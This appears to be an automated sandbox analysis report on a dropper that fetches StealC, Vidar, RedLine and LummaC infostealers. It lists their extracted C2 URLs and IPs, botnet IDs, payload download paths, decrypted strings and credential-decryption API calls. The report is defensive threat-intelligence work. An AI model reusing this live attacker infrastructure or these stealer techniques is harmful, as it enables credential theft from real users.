Source: 14.0.stealc_default2.exe.ca0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}
Source: 14.0.stealc_default2.exe.ca0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}
Source: 22.2.myrdx.exe.280000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": "89.105.223.196:29155", "Bot Id": "RDX", "Authorization Header": "21d3b2e8d7fdeff423c7a5819c5e64ed"}
Source: 20.2.InstallUtil.exe.600000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["fadehairucw.store", "presticitpo.store", "thumbystriw.store", "founpiuer.store", "scriptyprefej.store", "navygenerayk.store", "necklacedmny.store", "crisiwarny.store"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\LgAmARwZ\Application.exe	Virustotal: Detection: 26%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\myrdx[1].exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1000877001\25e6c25320.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1000878001\84d15ff2c9.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1000879001\03564c0e08.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 55%
Source: file.exe	Virustotal: Detection: 57%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\LgAmARwZ\Application.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\gold[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: scriptyprefej.store
Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: navygenerayk.store
Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: founpiuer.store
Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: necklacedmny.store
Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: thumbystriw.store
Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: fadehairucw.store
Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: crisiwarny.store
Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: presticitpo.store
Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: opinieni.store
Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: - Screen Resoluton:
Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: Workgroup: -
Source: 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String decryptor: 4SD0y4--MAGISTER

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CA9B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	14_2_00CA9B60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CAC820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA,	14_2_00CAC820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CA9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	14_2_00CA9AC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CB8EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	14_2_00CB8EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CA7240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	14_2_00CA7240
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAB6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	14_2_6BAB6C80

Source: Offnewhere.exe, 00000015.00000000.2796258598.00000000008F9000.00000002.00000001.01000000.00000014.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_cefda3a9-6

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 0000000E.00000002.2928542636.000000006BCDF000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: gold.exe, 00000013.00000002.2767640361.000000000050C000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: gold.exe, 00000013.00000002.2806606580.000000000465F000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2806606580.0000000004802000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2819140409.0000000005E30000.00000004.10000000.00040000.00000000.sdmp, gold.exe, 00000013.00000002.2774776253.0000000003886000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: gold.exe, 00000013.00000002.2806606580.000000000465F000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2806606580.0000000004802000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2819140409.0000000005E30000.00000004.10000000.00040000.00000000.sdmp, gold.exe, 00000013.00000002.2774776253.0000000003886000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: gold.exe, 00000013.00000002.2806606580.0000000004788000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2806606580.0000000004595000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2817662633.0000000005D60000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 0000000E.00000002.2928542636.000000006BCDF000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: OFF011F112LUQGJPCDB24W.exe, 00000025.00000002.3108575283.0000000000F22000.00000040.00000001.01000000.00000021.sdmp, OFF011F112LUQGJPCDB24W.exe, 00000025.00000003.3042907267.0000000004840000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: protobuf-net.pdb source: gold.exe, 00000013.00000002.2806606580.0000000004788000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2806606580.0000000004595000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2817662633.0000000005D60000.00000004.10000000.00040000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_0025ADB8 FindFirstFileExW,	8_2_0025ADB8
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_0025ADB8 FindFirstFileExW,	9_2_0025ADB8
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_0041B6EA FindFirstFileExW,	10_2_0041B6EA
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CAE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	14_2_00CAE430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CB4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	14_2_00CB4910
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CA16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	14_2_00CA16D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	14_2_00CADA80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CB3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	14_2_00CB3EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CAF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	14_2_00CAF6B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	14_2_00CABE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CB38B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	14_2_00CB38B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CB4570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	14_2_00CB4570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CAED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	14_2_00CAED20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	14_2_00CADE10

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor	URLs: fadehairucw.store
Source: Malware configuration extractor	URLs: presticitpo.store
Source: Malware configuration extractor	URLs: thumbystriw.store
Source: Malware configuration extractor	URLs: founpiuer.store
Source: Malware configuration extractor	URLs: scriptyprefej.store
Source: Malware configuration extractor	URLs: navygenerayk.store
Source: Malware configuration extractor	URLs: necklacedmny.store
Source: Malware configuration extractor	URLs: crisiwarny.store
Source: Malware configuration extractor	URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor	IPs: 185.215.113.16
Source: Malware configuration extractor	URLs: 89.105.223.196:29155

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_0026BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,

7_2_0026BD60

Source: Offnewhere.exe, 00000015.00000000.2796258598.00000000008F9000.00000002.00000001.01000000.00000014.sdmp, 1.exe, 0000001B.00000000.2881014480.0000000000F04000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://.css
Source: Offnewhere.exe, 00000015.00000000.2796258598.00000000008F9000.00000002.00000001.01000000.00000014.sdmp, 1.exe, 0000001B.00000000.2881014480.0000000000F04000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://.jpg
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.130.147.211/Files/1.exe0
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.130.147.211/Files/1.exe:
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.3018621240.000000000082C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.3012882720.000000000078D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/15.113.16/216e50adc2dd0a1bfe522b3effbbd4e64e3aa636b77##
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/15.113.16/ta
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/216e50adc2dd0a1bfe522b3effbbd4e64e3aa636b77
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Downloads
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.4561179734.0000000001101000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.4561179734.000000000105B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php&O
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php2O
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php9
Source: axplong.exe, 00000007.00000002.4561179734.0000000001101000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php9001
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpCOMJN
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpFN
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpNO
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpRN
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpVO
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded8
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedD
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedi
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedu
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php~O
Source: InstallUtil.exe, 00000014.00000002.3018621240.000000000082C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/K
Source: InstallUtil.exe, 00000014.00000002.3018621240.000000000082C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/S
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ViewSizePreferences.SourceAumid1
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/dobre/random.exe
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/dobre/random.exe5
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/dobre/splwow64.exe
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/12.exe
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/gold.exe
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/gold.exeh
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/myrdx.exe
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/myrdx.exef
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/stealc_default2.exe
Source: axplong.exe, 00000007.00000002.4561179734.000000000101B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.4561179734.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/zxcv.exe
Source: axplong.exe, 00000007.00000002.4561179734.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/zxcv.exe3
Source: axplong.exe, 00000007.00000002.4561179734.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/zxcv.exef69c5867ee82
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/lumma/random.exe
Source: InstallUtil.exe, 00000014.00000002.3013913479.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.3012882720.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ons
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe6
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ta
Source: stealc_default2.exe, 0000000E.00000002.2886105690.00000000007EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 0000000E.00000002.2886105690.00000000007EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 0000000E.00000002.2886105690.000000000081E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php.dll
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php3
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpch
Source: stealc_default2.exe, 0000000E.00000002.2886105690.000000000084E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpinomi
Source: stealc_default2.exe, 0000000E.00000002.2886105690.000000000084E000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpl
Source: stealc_default2.exe, 0000000E.00000002.2886105690.000000000084E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpla
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpos
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpp1#Ivx
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpt
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phption:
Source: stealc_default2.exe, 0000000E.00000002.2886105690.000000000084E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpwser
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/9
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/freebl3.dll
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/freebl3.dllY
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dll
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dllG
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllk
